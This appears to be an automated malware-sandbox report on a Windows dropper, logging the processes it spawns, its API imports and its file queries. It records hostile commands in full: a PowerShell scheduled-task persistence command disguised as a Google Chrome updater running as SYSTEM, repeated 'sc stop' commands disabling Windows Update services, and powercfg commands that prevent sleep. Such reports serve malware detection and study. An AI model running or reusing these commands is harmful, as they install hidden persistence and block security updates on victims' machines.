Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nvjdnn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#mgttsuddg#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\cdttvvc	Process created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc

Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp	Binary or memory string: Shell_TrayWndSVW
Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,	3_2_00429C40
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_0040DC66
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_0040FC68
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_00413472
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_0040E8C2
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0040FCC3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,	3_2_004138F7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_0041354C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoA,	3_2_0040A938
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0040A274
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0040FACC
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0040FE94
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_0040BE95
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,	3_2_0040FF54
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0040FBC1
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,	3_2_0040FFF7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_0040EBB0
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,	3_2_0040FFBB

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
